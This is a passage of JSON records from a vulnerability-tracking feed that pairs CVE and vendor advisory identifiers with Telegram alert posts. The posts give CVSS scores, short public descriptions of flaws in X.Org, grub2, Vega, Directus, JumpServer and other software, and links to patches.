https://access.redhat.com/security/cve/CVE-2025-26594\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345248", "creation_timestamp": "2025-03-27T04:25:59.000000Z"}, {"uuid": "818efdfa-5a3c-420d-b568-105bc12fab75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2879", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9013", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26594\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. The root cursor is referenced in the X server as a global variable. If a client frees the root cursor, the internal reference points to freed memory and causes a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:53:51.324Z\n\ud83d\udccf Modified: 2025-03-27T04:19:40.033Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26594\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345248", "creation_timestamp": "2025-03-27T04:25:59.000000Z"}, {"uuid": "5a7307d7-e6a5-4023-bcfa-274c80e5e2cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2861", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9013", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26594\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. The root cursor is referenced in the X server as a global variable. If a client frees the root cursor, the internal reference points to freed memory and causes a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:53:51.324Z\n\ud83d\udccf Modified: 2025-03-27T04:19:40.033Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26594\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345248", "creation_timestamp": "2025-03-27T04:25:59.000000Z"}, {"uuid": "a1a5f21c-50b3-4600-9018-13033cb8befe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2866", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9013", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26594\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. The root cursor is referenced in the X server as a global variable. If a client frees the root cursor, the internal reference points to freed memory and causes a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:53:51.324Z\n\ud83d\udccf Modified: 2025-03-27T04:19:40.033Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26594\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345248", "creation_timestamp": "2025-03-27T04:25:59.000000Z"}, {"uuid": "1f2850ff-08d6-4ebb-a807-502177525d3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RQ77-P4H8-4CRW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14255", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24358\n\ud83d\udd25 CVSS Score: 5.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: gorilla/csrf provides Cross Site Request Forgery (CSRF) prevention middleware for Go web applications &amp; services. Prior to 1.7.2, gorilla/csrf does not validate the Origin header against an allowlist. Its executes its validation of the Referer header for cross-origin requests only when it believes the request is being served over TLS. It determines this by inspecting the r.URL.Scheme value. However, this value is never populated for \"server\" requests per the Go spec, and so this check does not run in practice. This vulnerability allows an attacker who has gained XSS on a subdomain or top level domain to perform authenticated form submissions against gorilla/csrf protected targets that share the same top level domain. This vulnerability is fixed in 1.7.2.\n\ud83d\udccf Published: 2025-04-15T18:57:40.559Z\n\ud83d\udccf Modified: 2025-05-01T11:02:45.986Z\n\ud83d\udd17 References:\n1. https://github.com/gorilla/csrf/security/advisories/GHSA-rq77-p4h8-4crw\n2. https://github.com/gorilla/csrf/commit/9dd6af1f6d30fc79fb0d972394deebdabad6b5eb", "creation_timestamp": "2025-05-01T11:14:45.000000Z"}, {"uuid": "2971703c-10de-43b1-8ea8-691092b93de4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-56W8-48FP-6MGV", "type": "published-proof-of-concept", "source": "Telegram/ECfwiHytRiuQjRt5hCp2x-jLr0ISxnPwTPjtlVUfska4wnI", "content": "", "creation_timestamp": "2026-01-09T16:02:27.000000Z"}, {"uuid": "9442dc53-5d4a-44d0-b986-60d922d5ab7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M3CV-5HGP-HV35", "type": "published-proof-of-concept", "source": "Telegram/4zuUlGU6EvpMTWPbip1_D3Ts-W_MioI6unE3WF1UcmysLKI", "content": "", "creation_timestamp": "2026-01-13T00:02:07.000000Z"}, {"uuid": "19f14775-98db-4294-bed0-6cc233a1e1a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2653", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9234", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0624\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2. During the network boot process, when trying to search for the configuration file, grub copies data from a user controlled environment variable into an internal buffer using the grub_strcpy() function. During this step, it fails to consider the environment variable length when allocating the internal buffer, resulting in an out-of-bounds write. If correctly exploited, this issue may result in remote code execution through the same network segment grub is searching for the boot information, which can be used to by-pass secure boot protections.\n\ud83d\udccf Published: 2025-02-19T18:23:21.463Z\n\ud83d\udccf Modified: 2025-03-27T22:08:46.706Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2521\n2. https://access.redhat.com/errata/RHSA-2025:2653\n3. https://access.redhat.com/errata/RHSA-2025:2655\n4. https://access.redhat.com/errata/RHSA-2025:2675\n5. https://access.redhat.com/errata/RHSA-2025:2784\n6. https://access.redhat.com/errata/RHSA-2025:2799\n7. https://access.redhat.com/errata/RHSA-2025:2867\n8. https://access.redhat.com/errata/RHSA-2025:2869\n9. https://access.redhat.com/errata/RHSA-2025:3367\n10. https://access.redhat.com/security/cve/CVE-2025-0624\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2346112", "creation_timestamp": "2025-03-27T22:36:42.000000Z"}, {"uuid": "c8d78f1f-8d4c-4291-b22a-0a492c2d9374", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7860", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10160", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6291\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users.\n\ud83d\udccf Published: 2024-01-26T14:23:43.185Z\n\ud83d\udccf Modified: 2025-04-03T02:35:28.214Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/errata/RHSA-2023:7860\n7. https://access.redhat.com/errata/RHSA-2023:7861\n8. https://access.redhat.com/errata/RHSA-2024:0798\n9. https://access.redhat.com/errata/RHSA-2024:0799\n10. https://access.redhat.com/errata/RHSA-2024:0800\n11. https://access.redhat.com/errata/RHSA-2024:0801\n12. https://access.redhat.com/errata/RHSA-2024:0804\n13. https://access.redhat.com/security/cve/CVE-2023-6291\n14. https://bugzilla.redhat.com/show_bug.cgi?id=2251407", "creation_timestamp": "2025-04-03T03:33:49.000000Z"}, {"uuid": "3f0a5c43-2fdc-46fc-b679-c99b53e5f014", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3WGP-Q8M7-V33V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8766", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-40629\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: JumpServer is an open-source Privileged Access Management (PAM) tool that provides DevOps and IT teams with on-demand and secure access to SSH, RDP, Kubernetes, Database and RemoteApp endpoints through a web browser. An attacker can exploit the Ansible playbook to write arbitrary files, leading to remote code execution (RCE) in the Celery container. The Celery container runs as root and has database access, allowing an attacker to steal all secrets for hosts, create a new JumpServer account with admin privileges, or manipulate the database in other ways. This issue has been patched in release versions 3.10.12 and 4.0.0. It is recommended to upgrade the safe versions. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2024-07-18T17:04:10.251Z\n\ud83d\udccf Modified: 2025-03-25T19:59:14.014Z\n\ud83d\udd17 References:\n1. https://github.com/jumpserver/jumpserver/security/advisories/GHSA-3wgp-q8m7-v33v\n2. https://www.sonarsource.com/blog/diving-into-jumpserver-attackers-gateway-to-internal-networks-2-2", "creation_timestamp": "2025-03-25T20:24:36.000000Z"}, {"uuid": "07dc81b6-5b00-471b-9163-be6789a8de72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2874", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9006", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26601\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When changing an alarm, the values of the change mask are evaluated one after the other, changing the trigger values as requested, and eventually, SyncInitTrigger() is called. If one of the changes triggers an error, the function will return early, not adding the new sync object, possibly causing a use-after-free when the alarm eventually triggers.\n\ud83d\udccf Published: 2025-02-25T15:55:36.775Z\n\ud83d\udccf Modified: 2025-03-27T04:22:08.108Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26601\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345251", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "81b4f20a-c27d-4937-bf48-8c6a474b99c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2502", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9006", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26601\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When changing an alarm, the values of the change mask are evaluated one after the other, changing the trigger values as requested, and eventually, SyncInitTrigger() is called. If one of the changes triggers an error, the function will return early, not adding the new sync object, possibly causing a use-after-free when the alarm eventually triggers.\n\ud83d\udccf Published: 2025-02-25T15:55:36.775Z\n\ud83d\udccf Modified: 2025-03-27T04:22:08.108Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26601\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345251", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "b3a24268-d31b-4723-baf6-aeca485a1049", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HCP2-X6J4-29J7", "type": "published-proof-of-concept", "source": "Telegram/WQqRawnFxdQj2C7QSZvJhJYu2ip6AHddUppaVRsAsIpfVRo", "content": "", "creation_timestamp": "2026-01-10T08:01:06.000000Z"}, {"uuid": "9e657e7d-3e0d-464a-957c-1b7f5e2a0171", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2500", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9013", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26594\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. The root cursor is referenced in the X server as a global variable. If a client frees the root cursor, the internal reference points to freed memory and causes a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:53:51.324Z\n\ud83d\udccf Modified: 2025-03-27T04:19:40.033Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26594\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345248", "creation_timestamp": "2025-03-27T04:25:59.000000Z"}, {"uuid": "868ab0bc-f8f4-479f-9f0a-ff9901963e67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2875", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9013", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26594\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. The root cursor is referenced in the X server as a global variable. If a client frees the root cursor, the internal reference points to freed memory and causes a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:53:51.324Z\n\ud83d\udccf Modified: 2025-03-27T04:19:40.033Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26594\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345248", "creation_timestamp": "2025-03-27T04:25:59.000000Z"}, {"uuid": "c4ef965b-c00f-432c-bf28-ca6399281883", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RCW3-WMX7-CPHR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9091", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26619\n\ud83d\udd25 CVSS Score: 5.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: Vega is a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs. In `vega` 5.30.0 and lower and in `vega-functions` 5.15.0 and lower , it was possible to call JavaScript functions from the Vega expression language that were not meant to be supported. The issue is patched in `vega` `5.31.0`  and `vega-functions` `5.16.0`. Some workarounds are available. Run `vega` without `vega.expressionInterpreter`. This mode is not the default as it is slower. Alternatively, using the interpreter described in CSP safe mode (Content Security Policy) prevents arbitrary Javascript from running, so users of this mode are not affected by this vulnerability.\n\ud83d\udccf Published: 2025-03-27T13:51:38.442Z\n\ud83d\udccf Modified: 2025-03-27T14:21:44.479Z\n\ud83d\udd17 References:\n1. https://github.com/vega/vega/security/advisories/GHSA-rcw3-wmx7-cphr\n2. https://github.com/vega/vega-lite/issues/9469\n3. https://github.com/vega/vega/issues/3984\n4. https://github.com/vega/vega/commit/8fc129a6f8a11e96449c4ac0f63de0e5bfc7254c", "creation_timestamp": "2025-03-27T14:27:25.000000Z"}, {"uuid": "8012fa20-be16-441f-b5b3-8e662c3049bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7WQ3-JR35-275C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9122", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30352\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.0.0-alpha.4 and prior to version 11.5.0, the `search` query parameter allows users with access to a collection to filter items based on fields they do not have permission to view. This allows the enumeration of unknown field contents. The searchable columns (numbers &amp; strings) are not checked against permissions when injecting the `where` clauses for applying the search query. This leads to the possibility of enumerating those un-permitted fields. Version 11.5.0 fixes the issue.\n\ud83d\udccf Published: 2025-03-26T17:18:39.567Z\n\ud83d\udccf Modified: 2025-03-27T15:15:07.652Z\n\ud83d\udd17 References:\n1. https://github.com/directus/directus/security/advisories/GHSA-7wq3-jr35-275c\n2. https://github.com/directus/directus/commit/ac5a9964d9926f20dc063a74cb417dc7bbad676d", "creation_timestamp": "2025-03-27T15:26:55.000000Z"}, {"uuid": "a0b74425-a2a1-4248-bb36-3cbb7dcf22a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-963H-3V39-3PQF", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9118", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27793\n\ud83d\udd25 CVSS Score: 5.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: Vega is a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs. In Vega prior to version 5.32.0, corresponding to vega-functions prior to version 5.17.0, users running Vega/Vega-lite JSON definitions could run unexpected JavaScript code when drawing graphs, unless the library was used with the `vega-interpreter`. Vega version 5.32.0 and vega-functions version 5.17.0 fix the issue. As a workaround, use `vega` with expression interpreter.\n\ud83d\udccf Published: 2025-03-27T14:07:52.264Z\n\ud83d\udccf Modified: 2025-03-27T15:17:18.354Z\n\ud83d\udd17 References:\n1. https://github.com/vega/vega/security/advisories/GHSA-963h-3v39-3pqf\n2. https://github.com/vega/vega/commit/694560c0aa576df8b6c5f0f7d202ac82233e6966\n3. https://github.com/vega/vega/releases/tag/v5.32.0\n4. https://vega.github.io/vega/usage/interpreter", "creation_timestamp": "2025-03-27T15:26:49.000000Z"}, {"uuid": "a482b937-2e77-43f7-adba-e8b1d3682f85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3233-GGC5-M3QG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14506", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23203\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: Icinga Director is an Icinga config deployment tool. A Security vulnerability has been found starting in version 1.0.0 and prior to 1.10.3 and 1.11.3 on several director endpoints of REST API. To reproduce this vulnerability an authenticated user with permission to access the Director is required (plus api access with regard to the api endpoints). And even though some of these Icinga Director users are restricted from accessing certain objects, are able to retrieve information related to them if their name is known. This makes it possible to change the configuration of these objects by those Icinga Director users restricted from accessing them. This results in further exploitation, data breaches and sensitive information disclosure. Affected endpoints include icingaweb2/director/service, if the host name is left out of the query; icingaweb2/directore/notification; icingaweb2/director/serviceset; and icingaweb2/director/scheduled-downtime. In addition, the endpoint `icingaweb2/director/services?host=filteredHostName` returns a status code 200 even though the services for the host is filtered. This in turn lets the restricted user know that the host `filteredHostName` exists even though the user is restricted from accessing it.  This could again result in further exploitation of this information and data breaches. Icinga Director has patches in versions 1.10.3 and 1.11.1. If upgrading is not feasible, disable the director module for the users other than admin role for the time being.\n\ud83d\udccf Published: 2025-03-26T13:44:58.110Z\n\ud83d\udccf Modified: 2025-05-02T16:02:38.737Z\n\ud83d\udd17 References:\n1. https://github.com/Icinga/icingaweb2-module-director/security/advisories/GHSA-3233-ggc5-m3qg\n2. https://github.com/Icinga/icingaweb2-module-director/releases/tag/v1.10.3\n3. https://github.com/Icinga/icingaweb2-module-director/releases/tag/v1.11.3", "creation_timestamp": "2025-05-02T16:15:58.000000Z"}, {"uuid": "e749b9b8-bdb0-42ad-a660-df4597685da4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3XG8-CC8F-9WV2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9270", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-4064\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: A vulnerability was found in Dalli up to 3.2.2. It has been classified as problematic. Affected is the function self.meta_set of the file lib/dalli/protocol/meta/request_formatter.rb of the component Meta Protocol Handler. The manipulation of the argument cas/ttl leads to injection. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 3.2.3 is able to address this issue. The patch is identified as 48d594dae55934476fec61789e7a7c3700e0f50d. It is recommended to upgrade the affected component.\n\ud83d\udccf Published: 2022-11-19T00:00:00\n\ud83d\udccf Modified: 2025-03-28T05:29:58.623Z\n\ud83d\udd17 References:\n1. https://vuldb.com/?id.214026\n2. https://vuldb.com/?ctiid.214026\n3. https://github.com/petergoldstein/dalli/issues/932\n4. https://github.com/petergoldstein/dalli/pull/933\n5. https://github.com/petergoldstein/dalli/commit/48d594dae55934476fec61789e7a7c3700e0f50d\n6. https://github.com/petergoldstein/dalli/releases/tag/v3.2.3\n7. https://github.com/advisories/GHSA-3xg8-cc8f-9wv2", "creation_timestamp": "2025-03-28T06:29:45.000000Z"}, {"uuid": "decd25ac-a32f-431a-a90e-da6fa185e5f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5Q9W-F4WH-F535", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9680", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27095\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to 4.8.0 and 3.10.18, an attacker with a low-privileged account can access the Kubernetes session feature and manipulate the kubeconfig file to redirect API requests to an external server controlled by the attacker. This allows the attacker to intercept and capture the Kubernetes cluster token. This can potentially allow unauthorized access to the 